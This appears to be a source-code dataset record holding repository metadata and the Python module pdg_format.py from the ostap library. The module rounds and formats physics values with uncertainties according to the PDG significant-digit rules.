| 31.25 | 59 | 0.72 | 22 | 125 | 3.954545 | 0.636364 | 0.298851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009615 | 0.168 | 125 | 3 | 60 | 41.666667 | 0.826923 | 0.136 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
f766c70844a73ac671536d8a2ee5ca6dacc57ce6 | 43 | py | Python | solarbextrapolation/data/__init__.py | sunpy/solarbextrapolation | e064466df118cd72239ec3bcdc60ba42b40f1abb | [
"MIT"
] | 13 | 2015-09-29T12:46:58.000Z | 2021-09-24T06:13:27.000Z | solarbextrapolation/data/__init__.py | dstansby/solarbextrapolation | ec77ffe42978acd4d77f51ddfce5750c7e4cffac | [
"MIT",
"BSD-3-Clause"
] | 24 | 2015-06-24T13:45:44.000Z | 2020-02-15T00:06:38.000Z | solarbextrapolation/data/__init__.py | dstansby/solarbextrapolation | ec77ffe42978acd4d77f51ddfce5750c7e4cffac | [
"MIT",
"BSD-3-Clause"
] | 9 | 2015-06-04T16:35:43.000Z | 2019-05-01T20:39:05.000Z | from ._sample import download_sample_data
| 14.333333 | 41 | 0.860465 | 6 | 43 | 5.666667 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116279 | 43 | 2 | 42 | 21.5 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e3b7bfbec9d8e13180ac93a2187fa86cf6510292 | 35,075 | py | Python | ostap/utils/pdg_format.py | TatianaOvsiannikova/ostap | a005a78b4e2860ac8f4b618e94b4b563b2eddcf1 | [
"BSD-3-Clause"
] | 14 | 2017-03-24T12:38:08.000Z | 2022-02-21T05:00:57.000Z | ostap/utils/pdg_format.py | TatianaOvsiannikova/ostap | a005a78b4e2860ac8f4b618e94b4b563b2eddcf1 | [
"BSD-3-Clause"
] | 10 | 2019-03-08T18:48:42.000Z | 2022-03-22T11:59:48.000Z | ostap/utils/pdg_format.py | TatianaOvsiannikova/ostap | a005a78b4e2860ac8f4b618e94b4b563b2eddcf1 | [
"BSD-3-Clause"
] | 11 | 2017-03-23T15:29:58.000Z | 2022-02-21T05:03:57.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# =============================================================================
# @file
# Set of utilities for rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
# Quote:
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
#
# =============================================================================
""" Set of utilities for rounding according to PDG prescription
see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
see section 5.3 of doi:10.1088/0954-3899/33/1/001
Quote:
| The basic rule states that if the three highest order digits of the error
| lie between 100 and 354, we round to two significant digits. If they lie between
| 355 and 949, we round to one significant digit. Finally,
| if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
| In all cases, the central value is given with a precision that matches that of the error.
"""
# =============================================================================
__author__ = "Vanya BELYAEV Ivan.Belyaev@itep.ru"
__date__ = "2015-07-15"
__version__ = "$Revision$"
__all__ = (
'frexp10' , ## similar to math.frexp but with radix=10
'round_N' , ## round floating value to N-significant digits
'pdg_round' , ## round value,error-pair according to PDG prescription
'pdg_format' , ## format value&error according to PDF prescription
'pdg_format2' , ## format value+2errors according to PDG
'pdg_format3' , ## format value+3errors according to PDG
)
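# As a reminder of the frexp10 convention listed above, a minimal standalone
# sketch (the name frexp10_sketch is illustrative, not the ostap implementation,
# and assumes the common convention x == m * 10**e with 0.1 <= |m| < 1):
#
# ```python
import math

def frexp10_sketch(x):
    """Split x into (mantissa, exponent) with radix 10,
    so that x == m * 10**e and 0.1 <= |m| < 1 for x != 0."""
    if x == 0:
        return 0.0, 0
    e = math.floor(math.log10(abs(x))) + 1
    return x / 10 ** e, int(e)
# ```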
# ===============================================================================
import ROOT, math, sys, enum
from ostap.math.ve import VE
from ostap.math.base import frexp10, isfinite, isclose
from ostap.core.ostap_types import string_types, integer_types
# =============================================================================
# logging
# =============================================================================
from ostap.logger.logger import getLogger
if '__main__' == __name__ : logger = getLogger ( 'ostap.utils.pdg_format' )
else : logger = getLogger ( __name__ )
# =============================================================================
class ErrMode(enum.IntEnum):
    TOTAL     = 0 ## Use total uncertainty
    MIN       = 1 ## Use minimal uncertainty
    MAX       = 2 ## Use maximal uncertainty
    MEAN      = 3 ## Use mean
    AVERAGE   = 3 ## Use mean
    GEOMETRIC = 4 ## Use geometric mean
# =============================================================================
## get the reference error from the list of uncertainties
# @code
# error = ref_error ( 'total' , 0.1 , 0.2 , 0.3 )
# error = ref_error ( ErrMode.MIN , 0.1 , 0.2 , 0.3 )
# @endcode
def ref_error ( mode , error , *errors ) :
    """Get the reference error from the list of uncertainties
    >>> error = ref_error ( 'total' , 0.1 , 0.2 , 0.3 )
    >>> error = ref_error ( ErrMode.MIN , 0.1 , 0.2 , 0.3 )
    """
    if not errors : return abs ( error )
    umode = mode
    if isinstance ( mode , string_types ) :
        umode = mode.upper()
        if   umode in ( 'TOTAL'   , 'TOT'     , 'T'  ) : umode = ErrMode.TOTAL  .name
        elif umode in ( 'MINIMAL' , 'MINIMUM' , 'MN' ) : umode = ErrMode.MIN    .name
        elif umode in ( 'MAXIMAL' , 'MAXIMUM' , 'MX' ) : umode = ErrMode.MAX    .name
        elif umode in ( 'A' , 'AV' , 'AVE'           ) : umode = ErrMode.AVERAGE.name
        assert umode in ErrMode.__members__ ,\
               'ref_error: Unknown string mode: %s' % mode
        umode = ErrMode [ umode ]
    elif isinstance ( mode , integer_types ) :
        for k , v in ErrMode.__members__.items() :
            if v == mode :
                umode = v
                break
        else :
            raise ValueError ( "ref_error: Unknown integer mode %s" % mode )
    assert isinstance ( umode , ErrMode ) ,\
           'ref_error: Unknown mode %s' % umode
    if umode == ErrMode.TOTAL :
        result = error * error
        for e in errors : result += e * e
        return math.sqrt ( result )
    elif umode == ErrMode.MIN :
        result = abs ( error )
        for e in errors : result = min ( result , abs ( e ) )
        return result
    elif umode == ErrMode.MAX :
        result = abs ( error )
        for e in errors : result = max ( result , abs ( e ) )
        return result
    elif umode == ErrMode.GEOMETRIC :
        result = abs ( error )
        ne     = 1
        for e in errors :
            ae = abs ( e )
            if 0 < ae :
                result *= ae
                ne     += 1
        return result if 0 == result else pow ( result , 1.0 / ne )
    else : ## arithmetic mean
        result = abs ( error )
        ne     = 1
        for e in errors :
            result += abs ( e )
            ne     += 1
        return result / float ( ne )
# =============================================================================
## round to nearest integer, rounds half integers to nearest even integer
# It is just a simple wrapper around boost::numeric::converter
# @see Ostap::Math::round
## cpp_round = Ostap.Math.round
## cpp_round_N = Ostap.Math.round_N
## ============================================================================
# round value to N-digits
# @code
# new_value = round_N ( value , 3 )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def round_N ( value , n ) :
    """Round value to N-digits
    >>> new_value = round_N ( value , 3 )
    """
    assert isinstance ( n , integer_types ) and 0 <= n ,\
           "round_N: invalid ``n'' %s (must be non-negative integer)" % n
    ## return cpp_round_N ( value , n )
    v = float ( value )
    if 0 == v : return 0
    a , b = frexp10 ( v )
    e  = b - 1
    m  = a * 10
    ni = n - 1
    f1 = 10 ** ni
    f2 = 1
    if   ni < e : f2 = ( 10 ** ( e - ni ) )
    elif ni > e : f2 = 1.0 / ( 10 ** ( ni - e ) )
    return round ( m * f1 ) * float ( f2 )
# =============================================================================
## get ``mantissa'' (1<=m<10) and exponent for radix 10
#  similar to math.frexp, but with radix=10
# @code
# m,e = _frexp10_ ( value )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def _frexp10_ ( value ) :
    """Get ``mantissa'' (1<=m<10) and exponent for radix 10,
    similar to math.frexp, but with radix=10
    >>> m , e = _frexp10_ ( value )
    """
    m , e = frexp10 ( value )
    return m * 10 , e - 1
# =============================================================================
## get three significant digits from the floating value
# @code
# nums = three_digits ( value )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def three_digits ( value ) :
    """Get the first three significant digits
    >>> nums = three_digits ( value )
    """
    if not 0.1 <= abs ( value ) < 1 : value = frexp10 ( float ( value ) ) [0]
    return int ( round ( float ( value ) * 1000 , 0 ) )
# ==============================================================================
# Classify according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
#
# Cases:
# - -2, error is NaN
# - -1, error is Inf
# - 0, error is zero
# - 1, the first regular case
# - 2, the second regular case
# - 3, the third regular case
# @code
# case , rounded_error = pdg_case ( error )
# @endcode
def pdg_case ( error ) :
    """Classify according to PDG prescription
    - see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
    - see section 5.3 of doi:10.1088/0954-3899/33/1/001
    The basic rule states that
    - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
    - If they lie between 355 and 949, we round to one significant digit.
    - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
    Cases:
    - -2, error is NaN
    - -1, error is Inf
    -  0, error is zero
    -  1, the first regular case
    -  2, the second regular case
    -  3, the third regular case
    >>> error = ...
    >>> case , rounded_error = pdg_case ( error )
    """
    if   math.isnan ( error ) : return -2 , error
    elif math.isinf ( error ) : return -1 , error
    ne = abs ( three_digits ( error ) )
    if   0 == ne   : return 0 , 0
    elif ne <= 354 : return 1 , round_N ( error , 2 )
    elif ne <= 949 : return 2 , round_N ( error , 1 )
    else           : return 3 , round_N ( error , 1 )
# ==============================================================================
# make a rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# val, err , exponent, err_case = pdg_round__ ( value , error )
# print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_round__ ( value , error ) :
    """Make a rounding according to PDG prescription
    - see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
    - see section 5.3 of doi:10.1088/0954-3899/33/1/001
    Quote:
    The basic rule states that if the three highest order digits of the error
    lie between 100 and 354, we round to two significant digits. If they lie between
    355 and 949, we round to one significant digit. Finally,
    if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
    In all cases, the central value is given with a precision that matches that of the error.
    >>> val , err , exponent , err_case = pdg_round__ ( value , error )
    >>> print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
    """
    ecase , err = pdg_case ( error )
    assert -2 <= ecase <= 3 ,\
           'pdg_round: invalid error case %s/%s' % ( ecase , error )
    ## irregular cases :
    if ecase <= 0 or not isfinite ( value ) :
        return value , error , 0 , ecase
    ## regular error
    ee , be = _frexp10_ ( error )
    if   1 == ecase : q = be + 1 - 2
    elif 2 == ecase : q = be + 1 - 1
    elif 3 == ecase : q = be + 1 - 2
    r   = 10 ** q
    val = round ( float ( value ) / r ) * r * 1.0
    return val , err , q , ecase
# ===============================================================================
## make a rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# val , err , exponent = pdg_round_ ( value , error )
# print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_round_ ( value , error ) :
    """Make a rounding according to PDG prescription
    - see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
    - see section 5.3 of doi:10.1088/0954-3899/33/1/001
    Quote:
    The basic rule states that if the three highest order digits of the error
    lie between 100 and 354, we round to two significant digits. If they lie between
    355 and 949, we round to one significant digit. Finally,
    if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
    In all cases, the central value is given with a precision that matches that of the error.
    >>> val, err, exponent = pdg_round_ ( value , error )
    >>> print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
    """
    val , err , q , c = pdg_round__ ( value , error )
    return val , err , q
# =============================================================================
## make a rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# val , err = pdg_round ( value , error )
# print( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_round ( value , error ) :
    """Make a rounding according to PDG prescription
    - see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
    - see section 5.3 of doi:10.1088/0954-3899/33/1/001
    Quote:
    The basic rule states that
    - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
    - If they lie between 355 and 949, we round to one significant digit.
    - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
    In all cases, the central value is given with a precision that matches that of the error.
    >>> val, err = pdg_round ( value , error )
    >>> print ( ' Rounded value +/- error is (%s +/- %s)' % ( val , err ) )
    """
    val , err , f = pdg_round_ ( value , error )
    return val , err
# =============================================================================
## Round value/error according to PDG prescription and format it for print
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
#
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# print ( ' Rounded value/error is %s ' % pdg_format ( value , error , True ) )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_format ( value , error , latex = False ) :
    """Round value/error according to PDG prescription and format it for print
    - see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
    - see section 5.3 of doi:10.1088/0954-3899/33/1/001
    Quote:
    The basic rule states that
    - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
    - If they lie between 355 and 949, we round to one significant digit.
    - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
    In all cases, the central value is given with a precision that matches that of the error.
    >>> value, error = ...
    >>> print ( ' Rounded value/error is %s ' % pdg_format ( value , error , True ) )
    """
    val , err , q , ecase = pdg_round__ ( value , error )

    if ecase <= 0 :
        if not isfinite ( val ) :
            return ( '%+g \\pm %-g ' % ( val , err ) ) if latex else ( '%+g +/- %-g ' % ( val , err ) )
        else :
            qv , bv = _frexp10_ ( val )
            if 0 != bv :
                if latex : return '(%+.2f \\pm %-s)\\times 10^{%d}' % ( qv , err / 10 ** bv , bv )
                else     : return '(%+.2f +/- %-s)*10^{%d}'         % ( qv , err / 10 ** bv , bv )
            else :
                if latex : return ' %+.2f \\pm %-s ' % ( qv , err )
                else     : return ' %+.2f +/- %-s ' % ( qv , err )

    qe , be = _frexp10_ ( error )
    a  , b  = divmod ( be , 3 )

    if   1 == ecase :
        if   0 == b :
            nd = 1
        elif 1 == b :
            nd = 3
            a += 1
        elif 2 == b :
            a += 1
            nd = 2
    elif 2 == ecase :
        if   0 == b :
            nd = 0
            if 2 == a % 3 :
                nd = 3
                a  = a + 1
        elif 1 == b :
            nd = 2
            a += 1
        elif 2 == b :
            nd = 1
            a += 1
    elif 3 == ecase :
        if   0 == b :
            nd = 0
            if 2 == a % 3 :
                nd = 3
                a  = a + 1
        elif 1 == b :
            nd = 2
            a += 1
        elif 2 == b :
            nd = 1
            a += 1

    if 0 == a :
        if latex : fmt = '(%%+.%df \\pm %%.%df)' % ( nd , nd )
        else     : fmt = ' %%+.%df +/- %%.%df '  % ( nd , nd )
        return fmt % ( val , err )

    if latex : fmt = '(%%+.%df \\pm %%.%df)\\times 10^{%%d}' % ( nd , nd )
    else     : fmt = '(%%+.%df +/- %%.%df)*10^{%%d}'         % ( nd , nd )
    scale = 1.0 / 10 ** ( 3 * a )
    return fmt % ( val * scale , err * scale , 3 * a )
# =============================================================================
## Round value/error according to PDG prescription and format it for print
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
#
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# print ( ' Rounded value/error is %s ' % pdg_format2 ( value , error1 , error2 , True ) )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_format2 ( value , error1 , error2 , latex = False , mode = ErrMode.TOTAL ) :
    """Round value/errors according to PDG prescription and format them for print
    - see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
    - see section 5.3 of doi:10.1088/0954-3899/33/1/001
    Quote:
    The basic rule states that
    - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
    - If they lie between 355 and 949, we round to one significant digit.
    - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
    In all cases, the central value is given with a precision that matches that of the error.
    >>> value, error1, error2 = ...
    >>> print ( ' Rounded value/error is %s ' % pdg_format2 ( value , error1 , error2 , True ) )
    """
    error = ref_error ( mode , error1 , error2 )
    val , err , q , ecase = pdg_round__ ( value , error )

    if ecase <= 0 or ( not isfinite ( error1 ) ) or ( not isfinite ( error2 ) ) :
        if not isfinite ( val ) :
            return ( '%+g \\pm %-g \\pm %-g ' % ( val , error1 , error2 ) ) if latex else \
                   ( '%+g +/- %-g +/- %-g'    % ( val , error1 , error2 ) )
        else :
            qv , bv = _frexp10_ ( val )
            if 0 != bv :
                scale = 1.0 / 10 ** bv
                if latex : return '(%+.2f \\pm %-s \\pm %-s)\\times 10^{%d}' % ( qv , error1 * scale , error2 * scale , bv )
                else     : return '(%+.2f +/- %-s +/- %-s)*10^{%d}'          % ( qv , error1 * scale , error2 * scale , bv )
            else :
                if latex : return ' %+.2f \\pm %-s \\pm %-s ' % ( qv , error1 , error2 )
                else     : return ' %+.2f +/- %-s +/- %-s '   % ( qv , error1 , error2 )

    qe , be = _frexp10_ ( error )
    a  , b  = divmod ( be , 3 )

    if   1 == ecase :
        err1 = round_N ( error1 , 2 ) if isclose ( error1 , error , 1.e-2 ) else err
        err2 = round_N ( error2 , 2 ) if isclose ( error2 , error , 1.e-2 ) else err
        if   0 == b :
            nd = 1
        elif 1 == b :
            nd = 3
            a += 1
        elif 2 == b :
            a += 1
            nd = 2
    elif 2 == ecase :
        err1 = round_N ( error1 , 1 ) if isclose ( error1 , error , 1.e-2 ) else err
        err2 = round_N ( error2 , 1 ) if isclose ( error2 , error , 1.e-2 ) else err
        if   0 == b :
            nd = 0
            if 2 == a % 3 :
                nd = 3
                a  = a + 1
        elif 1 == b :
            nd = 2
            a += 1
        elif 2 == b :
            nd = 1
            a += 1
    elif 3 == ecase :
        err1 = round_N ( error1 , 2 ) if isclose ( error1 , error , 1.e-2 ) else err
        err2 = round_N ( error2 , 2 ) if isclose ( error2 , error , 1.e-2 ) else err
        if   0 == b :
            nd = 0
            if 2 == a % 3 :
                nd = 3
                a  = a + 1
        elif 1 == b :
            nd = 2
            a += 1
        elif 2 == b :
            nd = 1
            a += 1

    if 0 == a :
        if latex : fmt = '(%%+.%df \\pm %%.%df \\pm %%.%df)' % ( nd , nd , nd )
        else     : fmt = ' %%+.%df +/- %%.%df +/- %%.%df '   % ( nd , nd , nd )
        return fmt % ( val , err1 , err2 )

    if latex : fmt = '(%%+.%df \\pm %%.%df \\pm %%.%df)\\times 10^{%%d}' % ( nd , nd , nd )
    else     : fmt = '(%%+.%df +/- %%.%df +/- %%.%df)*10^{%%d}'          % ( nd , nd , nd )
    scale = 1.0 / 10 ** ( 3 * a )
    return fmt % ( val * scale , err1 * scale , err2 * scale , 3 * a )
# =============================================================================
## Round value/error according to PDG prescription and format it for print
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that
# - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
# - If they lie between 355 and 949, we round to one significant digit.
# - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
#
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# print ( ' Rounded value/error is %s ' % pdg_format3 ( value , error1 , error2 , error3 , True ) )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def pdg_format3 ( value , error1 , error2 , error3 , latex = False , mode = 'total' ) :
    """Round value/errors according to PDG prescription and format them for print
    - see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
    - see section 5.3 of doi:10.1088/0954-3899/33/1/001
    Quote:
    The basic rule states that
    - if the three highest order digits of the error lie between 100 and 354, we round to two significant digits.
    - If they lie between 355 and 949, we round to one significant digit.
    - Finally, if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
    In all cases, the central value is given with a precision that matches that of the error.
    >>> value, error1, error2, error3 = ...
    >>> print ( ' Rounded value/error is %s ' % pdg_format3 ( value , error1 , error2 , error3 , True ) )
    """
    error = ref_error ( mode , error1 , error2 , error3 )
    val , err , q , ecase = pdg_round__ ( value , error )

    if ecase <= 0 or ( not isfinite ( error1 ) ) or ( not isfinite ( error2 ) ) or ( not isfinite ( error3 ) ) :
        if not isfinite ( val ) :
            return ( '%+g \\pm %-g \\pm %-g \\pm %-g ' % ( val , error1 , error2 , error3 ) ) if latex else \
                   ( '%+g +/- %-g +/- %-g +/- %-g'     % ( val , error1 , error2 , error3 ) )
        else :
            qv , bv = _frexp10_ ( val )
            if 0 != bv :
                scale = 1.0 / 10 ** bv
                if latex : return '(%+.2f \\pm %-s \\pm %-s \\pm %-s)\\times 10^{%d}' % ( qv , error1 * scale , error2 * scale , error3 * scale , bv )
                else     : return '(%+.2f +/- %-s +/- %-s +/- %-s)*10^{%d}'           % ( qv , error1 * scale , error2 * scale , error3 * scale , bv )
            else :
                if latex : return ' %+.2f \\pm %-s \\pm %-s \\pm %-s ' % ( qv , error1 , error2 , error3 )
                else     : return ' %+.2f +/- %-s +/- %-s +/- %-s '    % ( qv , error1 , error2 , error3 )

    qe , be = _frexp10_ ( error )
    a  , b  = divmod ( be , 3 )

    if   1 == ecase :
        err1 = round_N ( error1 , 2 ) if isclose ( error1 , error , 1.e-2 ) else err
        err2 = round_N ( error2 , 2 ) if isclose ( error2 , error , 1.e-2 ) else err
        err3 = round_N ( error3 , 2 ) if isclose ( error3 , error , 1.e-2 ) else err
        if   0 == b :
            nd = 1
        elif 1 == b :
            nd = 3
            a += 1
        elif 2 == b :
            a += 1
            nd = 2
    elif 2 == ecase :
        err1 = round_N ( error1 , 1 ) if isclose ( error1 , error , 1.e-2 ) else err
        err2 = round_N ( error2 , 1 ) if isclose ( error2 , error , 1.e-2 ) else err
        err3 = round_N ( error3 , 1 ) if isclose ( error3 , error , 1.e-2 ) else err
        if   0 == b :
            nd = 0
            if 2 == a % 3 :
                nd = 3
                a  = a + 1
        elif 1 == b :
            nd = 2
            a += 1
        elif 2 == b :
            nd = 1
            a += 1
    elif 3 == ecase :
        err1 = round_N ( error1 , 2 ) if isclose ( error1 , error , 1.e-2 ) else err
        err2 = round_N ( error2 , 2 ) if isclose ( error2 , error , 1.e-2 ) else err
        err3 = round_N ( error3 , 2 ) if isclose ( error3 , error , 1.e-2 ) else err
        if   0 == b :
            nd = 0
            if 2 == a % 3 :
                nd = 3
                a  = a + 1
        elif 1 == b :
            nd = 2
            a += 1
        elif 2 == b :
            nd = 1
            a += 1

    if 0 == a :
        if latex : fmt = '(%%+.%df \\pm %%.%df \\pm %%.%df \\pm %%.%df)' % ( nd , nd , nd , nd )
        else     : fmt = ' %%+.%df +/- %%.%df +/- %%.%df +/- %%.%df '    % ( nd , nd , nd , nd )
        return fmt % ( val , err1 , err2 , err3 )

    if latex : fmt = '(%%+.%df \\pm %%.%df \\pm %%.%df \\pm %%.%df)\\times 10^{%%d}' % ( nd , nd , nd , nd )
    else     : fmt = '(%%+.%df +/- %%.%df +/- %%.%df +/- %%.%df)*10^{%%d}'           % ( nd , nd , nd , nd )
    scale = 1.0 / 10 ** ( 3 * a )
    return fmt % ( val * scale , err1 * scale , err2 * scale , err3 * scale , 3 * a )
# ====================================================================================
## make a rounding according to PDG prescription
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# ve = VE( ...
# vr = ve.pdg()
# print ( ' Rounded value with error is %s ' % vr )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def _ve_pdg_ ( ve ) :
    """Make a rounding according to PDG prescription
    - see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
    - see section 5.3 of doi:10.1088/0954-3899/33/1/001
    Quote:
    The basic rule states that if the three highest order digits of the error
    lie between 100 and 354, we round to two significant digits. If they lie between
    355 and 949, we round to one significant digit. Finally,
    if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
    In all cases, the central value is given with a precision that matches that of the error.
    >>> ve = VE ( ... )
    >>> vr = ve.pdg()
    >>> print ( ' Rounded value with error is %s ' % vr )
    """
    v , e = pdg_round ( ve.value () , ve.error () )
    return VE ( v , e * e )
# =============================================================================
## Round value/error according to PDG prescription and format it for print
# @see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
# @see section 5.3 of doi:10.1088/0954-3899/33/1/001
#
# The basic rule states that if the three highest order digits of the error
# lie between 100 and 354, we round to two significant digits. If they lie between
# 355 and 949, we round to one significant digit. Finally,
# if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
# In all cases, the central value is given with a precision that matches that of the error.
#
# @code
# ve = VE( ... )
# print ( ' Rounded value/error is %s ' % ve.pdg_format () )
# @endcode
# @author Vanya BELYAEV Ivan.Belyaev@itep.ru
# @date 2015-07-20
def _ve_pdg_format_ ( ve , latex = False ) :
    """Round value/error according to PDG prescription and format it for print
    - see http://pdg.lbl.gov/2010/reviews/rpp2010-rev-rpp-intro.pdf
    - see section 5.3 of doi:10.1088/0954-3899/33/1/001
    Quote:
    The basic rule states that if the three highest order digits of the error
    lie between 100 and 354, we round to two significant digits. If they lie between
    355 and 949, we round to one significant digit. Finally,
    if they lie between 950 and 999, we round up to 1000 and keep two significant digits.
    In all cases, the central value is given with a precision that matches that of the error.
    >>> ve = VE ( ... )
    >>> print ( ' Rounded value/error is %s ' % ve.pdg_format () )
    """
    return pdg_format ( ve.value () , ve.error () , latex )
# =============================================================================
## finally decorate class ValueWithError
# =============================================================================
VE.pdg = _ve_pdg_
VE.pdg_format = _ve_pdg_format_
# =============================================================================
## insert it to math
if not hasattr ( math , 'frexp10' ) : math.frexp10 = frexp10
if not hasattr ( math , 'round_N' ) : math.round_N = round_N
# =============================================================================
if '__main__' == __name__ :

    from ostap.utils.docme import docme
    docme ( __name__ , logger = logger )

    N    = 37
